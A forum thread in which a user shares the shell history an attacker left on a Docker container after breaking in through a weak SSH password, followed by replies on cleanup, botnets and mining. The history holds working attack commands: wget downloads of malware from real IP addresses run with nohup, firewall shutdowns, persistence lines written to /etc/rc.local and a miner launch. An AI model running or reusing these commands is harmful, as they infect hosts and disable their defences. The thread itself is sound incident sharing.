V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
suconghou
V2EX  ›  信息安全

docker 容器 ssh 的弱密码被攻破了,看看黑客都干了啥

  •  
  •   suconghou · 2016-12-29 16:55:57 +08:00 · 5473 次点击
    这是一个创建于 2872 天前的主题,其中的信息可能已经有所发展或是发生改变。
    ~ # cat .ash_history 
    service iptables stop
    wget http://211.147.119.195:1611/Linux2.6
    chmod 0755 /root/Linux2.6
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    chmod 777 Linux2.6
    ./Linux2.6
    chmod 0755 /root/Linux2.6
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    chmod 0777 Linux2.6
    chmod u+x Linux2.6
    ./Linux2.6 &
    chmod u+x Linux2.6
    ./Linux2.6 &
    cd /tmp
    service iptables stop
    wget http://211.147.119.195:1611/Linux2.6
    chmod 0755 /root/Linux2.6
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    chmod 777 Linux2.6
    ./164
    chmod 0755 /root/Linux2.6
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    chmod 0777 Linux2.6
    chmod u+x Linux2.6
    ./Linux2.6 &
    chmod u+x dos6cc4
    ./Linux2.6 &
    cd /tmp
    echo "cd  /root/">>/etc/rc.local
    echo "./Linux2.6&">>/etc/rc.local
    echo "/etc/init.d/iptables stop">>/etc/rc.local
    /gisdfoewrsfdf
    /bin/busybox cp; /gisdfoewrsfdf
    /bin/busybox  mount ;/gisdfoewrsfdf
    /bin/busybox  echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox  cat /tmp/.nippon; /bin/busybox  rm -f /tmp/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox  cat /var/tmp/.nippon; /bin/busybox  rm -f /var/tmp/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox  cat //.nippon; /bin/busybox  rm -f //.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox  cat /proc/.nippon; /bin/busybox  rm -f /proc/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox  cat /dev/.nippon; /bin/busybox  rm -f /dev/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox  cat /dev/pts/.nippon; /bin/busybox  rm -f /dev/pts/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox  cat /sys/.nippon; /bin/busybox  rm -f /sys/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox  cat /sys/fs/cgroup/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox  cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/systemd/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox  cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/cpuset/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox  cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/perf_event/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox  cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/net_cls/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox  cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox  cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/blkio/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox  cat /sys/fs/cgroup/memory/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/memory/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox  cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/freezer/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox  cat /sys/fs/cgroup/devices/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/devices/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox  cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/hugetlb/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox  cat /dev/mqueue/.nippon; /bin/busybox  rm -f /dev/mqueue/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox  cat /etc/resolv.conf/.nippon; /bin/busybox  rm -f /etc/resolv.conf/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox  cat /etc/hostname/.nippon; /bin/busybox  rm -f /etc/hostname/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox  cat /etc/hosts/.nippon; /bin/busybox  rm -f /etc/hosts/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox  cat /dev/shm/.nippon; /bin/busybox  rm -f /dev/shm/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox  cat /var/lib/mysql/.nippon; /bin/busybox  rm -f /var/lib/mysql/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox  cat /proc/bus/.nippon; /bin/busybox  rm -f /proc/bus/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox  cat /proc/fs/.nippon; /bin/busybox  rm -f /proc/fs/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox  cat /proc/irq/.nippon; /bin/busybox  rm -f /proc/irq/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox  cat /proc/sys/.nippon; /bin/busybox  rm -f /proc/sys/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox  cat /proc/sysrq-trigger/.nippon; /bin/busybox  rm -f /proc/sysrq-trigger/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox  cat /proc/kcore/.nippon; /bin/busybox  rm -f /proc/kcore/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox  cat /proc/timer_list/.nippon; /bin/busybox  rm -f /proc/timer_list/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox  cat /proc/timer_stats/.nippon; /bin/busybox  rm -f /proc/timer_stats/.nippon
    /bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox  cat /proc/sched_debug/.nippon; /bin/busybox  rm -f /proc/sched_debug/.nippon
    /gisdfoewrsfdf
    /bin/busybox cat /bin/echo ;/gisdfoewrsfdf
    cd /tmp; /bin/busybox  wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox  chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf
    service iptables stop
    wget http://211.147.112.207:1611/Linux2.4
    chmod 0755 /root/Linux2.4
    nohup /root/Linux2.4 > /dev/null 2>&1 &
    chmod 777 Linux2.4
    ./Linux2.4
    chmod 0755 /root/Linux2.4
    nohup /root/Linux2.4 > /dev/null 2>&1 &
    chmod 0777 Linux2.4
    chmod u+x Linux2.4
    ./Linux2.4 &
    chmod u+x Linux2.4
    ./Linux2.4 &
    cd /tmp
    service iptables stop
    wget http://211.147.112.207:1611/Linux2.6
    chmod 0755 /root/Linux2.6
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    chmod 777 Linux2.6
    service iptables stop
    ./164
    wget http://211.147.112.207:1611/Linux2.4
    chmod 0755 /root/Linux2.6
    chmod 0755 /root/Linux2.4
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    nohup /root/Linux2.4 > /dev/null 2>&1 &
    chmod 0777 Linux2.6
    chmod 777 Linux2.4
    chmod u+x Linux2.6
    ./Linux2.4
    ./Linux2.6 &
    chmod 0755 /root/Linux2.4
    chmod u+x dos6cc4
    nohup /root/Linux2.4 > /dev/null 2>&1 &
    ./Linux2.6 &
    chmod 0777 Linux2.4
    cd /tmp
    chmod u+x Linux2.4
    service iptables stop
    ./Linux2.4 &
    wget http://211.147.112.207:1611/dd-wrt
    chmod u+x Linux2.4
    chmod 0755 /root/dd-wrt
    ./Linux2.4 &
    nohup /root/dd-wrt > /dev/null 2>&1 &
    cd /tmp
    chmod 777 dd-wrt
    service iptables stop
    ./dd-wrt
    wget http://211.147.112.207:1611/Linux2.6
    chmod 0755 /root/dd-wrt
    chmod 0755 /root/Linux2.6
    nohup /root/dd-wrt > /dev/null 2>&1 &
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    chmod 0777 dd-wrt
    chmod 777 Linux2.6
    chmod u+x dd-wrt
    ./164
    ./dd-wrt &
    chmod 0755 /root/Linux2.6
    chmod u+x dd-wrt
    nohup /root/Linux2.6 > /dev/null 2>&1 &
    ./dd-wrt &
    chmod 0777 Linux2.6
    cd /tmp
    chmod u+x Linux2.6
    service iptables stop
    ./Linux2.6 &
    wget http://211.147.112.207:1611/linux-arm
    chmod u+x dos6cc4
    chmod 0755 /root/linux-arm
    ./Linux2.6 &
    nohup /root/linux-arm > /dev/null 2>&1 &
    cd /tmp
    chmod 777 linux-arm
    service iptables stop
    ./linux-arm
    wget http://211.147.112.207:1611/dd-wrt
    chmod 0755 /root/linux-arm
    nohup /root/linux-arm > /dev/null 2>&1 &
    chmod 0777 linux-arm
    chmod u+x linux-arm
    chmod 0755 /root/dd-wrt
    nohup /root/dd-wrt > /dev/null 2>&1 &
    chmod 777 dd-wrt
    ./dd-wrt
    ./linux-arm &
    chmod 0755 /root/dd-wrt
    chmod u+x linux-arm
    nohup /root/dd-wrt > /dev/null 2>&1 &
    ./linux-arm &
    chmod 0777 dd-wrt
    cd /tmp
    chmod u+x dd-wrt
    service iptables stop
    ./dd-wrt &
    wget http://211.147.112.207:1611/linux-mips
    chmod u+x dd-wrt
    ./dd-wrt &
    chmod 0755 /root/linux-mips
    nohup /root/linux-mips > /dev/null 2>&1 &
    cd /tmp
    chmod 777 linux-mips
    service iptables stop
    ./linux-mips
    wget http://211.147.112.207:1611/linux-arm
    chmod 0755 /root/linux-mips
    chmod 0755 /root/linux-arm
    nohup /root/linux-mips > /dev/null 2>&1 &
    nohup /root/linux-arm > /dev/null 2>&1 &
    chmod 0777 linux-mips
    chmod 777 linux-arm
    chmod u+x linux-mips
    ./linux-arm
    ./linux-mips &
    chmod 0755 /root/linux-arm
    chmod u+x linux-mips
    nohup /root/linux-arm > /dev/null 2>&1 &
    ./linux-mips &
    chmod 0777 linux-arm
    cd /tmp
    chmod u+x linux-arm
    service iptables stop
    ./linux-arm &
    wget http://211.147.112.207:1611/taskhost.exe
    chmod u+x linux-arm
    chmod 0755 /root/taskhost.exe
    ./linux-arm &
    nohup /root/taskhost.exe > /dev/null 2>&1 &
    cd /tmp
    chmod 777 taskhost.exe
    service iptables stop
    ./taskhost.exe
    wget http://211.147.112.207:1611/linux-mips
    chmod 0755 /root/taskhost.exe
    chmod 0755 /root/linux-mips
    nohup /root/taskhost.exe > /dev/null 2>&1 &
    nohup /root/linux-mips > /dev/null 2>&1 &
    chmod 0777 taskhost.exe
    chmod 777 linux-mips
    chmod u+x taskhost.exe
    ./linux-mips
    ./taskhost.exe &
    chmod 0755 /root/linux-mips
    chmod u+x taskhost.exe
    nohup /root/linux-mips > /dev/null 2>&1 &
    ./taskhost.exe &
    chmod 0777 linux-mips
    chmod u+x linux-mips
    cd /tmp
    ./linux-mips &
    echo "cd  /root/">>/etc/rc.local
    chmod u+x linux-mips
    echo "./Linux2.4&">>/etc/rc.local
    ./linux-mips &
    echo "./Linux2.6&">>/etc/rc.local
    cd /tmp
    echo "./dd-wrt&">>/etc/rc.local
    service iptables stop
    echo "./linux-arm&">>/etc/rc.local
    wget http://211.147.112.207:1611/taskhost.exe
    echo "./linux-mips&">>/etc/rc.local
    chmod 0755 /root/taskhost.exe
    echo "./taskhost&">>/etc/rc.local
    nohup /root/taskhost.exe > /dev/null 2>&1 &
    echo "/etc/init.d/iptables stop">>/etc/rc.local
    chmod 777 taskhost.exe
    ./taskhost.exe
    chmod 0755 /root/taskhost.exe
    nohup /root/taskhost.exe > /dev/null 2>&1 &
    chmod 0777 taskhost.exe
    chmod u+x taskhost.exe
    ./taskhost.exe &
    chmod u+x taskhost.exe
    ./taskhost.exe &
    cd /tmp
    echo "cd  /root/">>/etc/rc.local
    echo "./Linux2.4&">>/etc/rc.local
    echo "./Linux2.6&">>/etc/rc.local
    echo "./dd-wrt&">>/etc/rc.local
    echo "./linux-arm&">>/etc/rc.local
    echo "./linux-mips&">>/etc/rc.local
    echo "./taskhost&">>/etc/rc.local
    echo "/etc/init.d/iptables stop">>/etc/rc.local
    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop
    cd /tmp
    wget http://115.236.92.99:12345/bins.sh
    chmod 777 bins.sh
    ./bins.sh
    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop
    cd /tmp
    wget http://115.236.92.99:12345/marlin
    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop
    CD /tmp
    wget http://115.236.92.99:8846/2500
    chmod 777 2500
    ./2500 >/dev/null 2>&1 &
    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop
    CD /tmp
    wget http://115.236.92.99:12345/2500
    chmod 777 2500
    ./2500 >/dev/null 2>&1 &
    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop
    cd /tmp
    wget http://115.236.92.99:12345/marlin
    chmod 777 marlin
    ./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20
    
    12 条回复    2017-01-19 00:35:00 +08:00
    suconghou
        1
    suconghou  
    OP
       2016-12-29 17:08:31 +08:00
    /etc/init.d # ls
    DbSecuritySpt QsystemsshMmt VsystemsshMdt mariadb rc.local selinux
    /etc/init.d # rm *t
    /etc/init.d # ls
    mariadb rc.local selinux
    /etc/init.d # cat selinux
    #!/bin/bash
    /usr/bin/bsd-port/getty
    /etc/init.d # ls -lh /usr/bin/bsd-port/getty
    -rwxr-xr-x 1 root root 1.2M Dec 17 15:49 /usr/bin/bsd-port/getty
    /etc/init.d # md5sum /usr/bin/bsd-port/getty
    2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/bsd-port/getty
    /etc/init.d # md5sum /bin/ps
    2dafa3cb07d8e13ae9bf9136ed97403c /bin/ps
    /etc/init.d # md5sum /bin/netstat
    2dafa3cb07d8e13ae9bf9136ed97403c /bin/netstat
    /etc/init.d # md5sum /usr/bin/lsof
    2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/lsof
    /etc/init.d #


    都是这个 2dafa
    swulling
        2
    swulling  
       2016-12-29 17:12:24 +08:00
    这个不叫『黑客』,这个叫『脚本小子』
    ryd994
        3
    ryd994  
       2016-12-29 17:12:50 +08:00 via Android
    一般不建议用 docker 做蜜罐,因为如果对方看出来的话,想打穿还是有可能的
    suconghou
        4
    suconghou  
    OP
       2016-12-29 17:19:36 +08:00
    无意间成了蜜罐 已停用 ssh
    megatron
        5
    megatron  
       2016-12-29 17:52:53 +08:00
    这是照着教材来的?
    说个好玩儿的,前两天一个测试机被入侵了,入侵者竟然帮我升级了 jdk ,我想了半天也不知道为什么。
    xss
        6
    xss  
       2016-12-29 18:18:04 +08:00
    这个是自动化脚本干的, 并不是人进行的操作.
    应该是僵尸网络中的节点在找更多的节点, 加入僵尸网络.
    suconghou
        7
    suconghou  
    OP
       2016-12-29 18:42:45 +08:00
    查了一下 可能是透过 redis 入侵的, cron 文件都被改了,redis 我开着外网端口来着.
    tanszhe
        8
    tanszhe  
       2016-12-29 19:02:45 +08:00
    干什么了什么啊?求大神解释一下这段代码干了什么?
    dant
        9
    dant  
       2016-12-29 23:51:20 +08:00
    挖矿吧
    maxwel1
        10
    maxwel1  
       2017-01-11 13:49:13 +08:00
    测试用的 centos ,还在调试,然后过了个周末发现被执行了上面那个脚本,如果不重装的话,怎么清理干净呢?有什么办法吗?
    suconghou
        11
    suconghou  
    OP
       2017-01-11 14:02:23 +08:00
    @maxwel1 建议备份重装 ps lsof netstat 还有开机启动项,动态链接库,很多都被替换了.
    maxwel1
        12
    maxwel1  
       2017-01-19 00:35:00 +08:00
    @suconghou 多谢,看来只好重装了,最近这两周没空搞它,直接关机了。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2670 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 06:08 · PVG 14:08 · LAX 22:08 · JFK 01:08
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.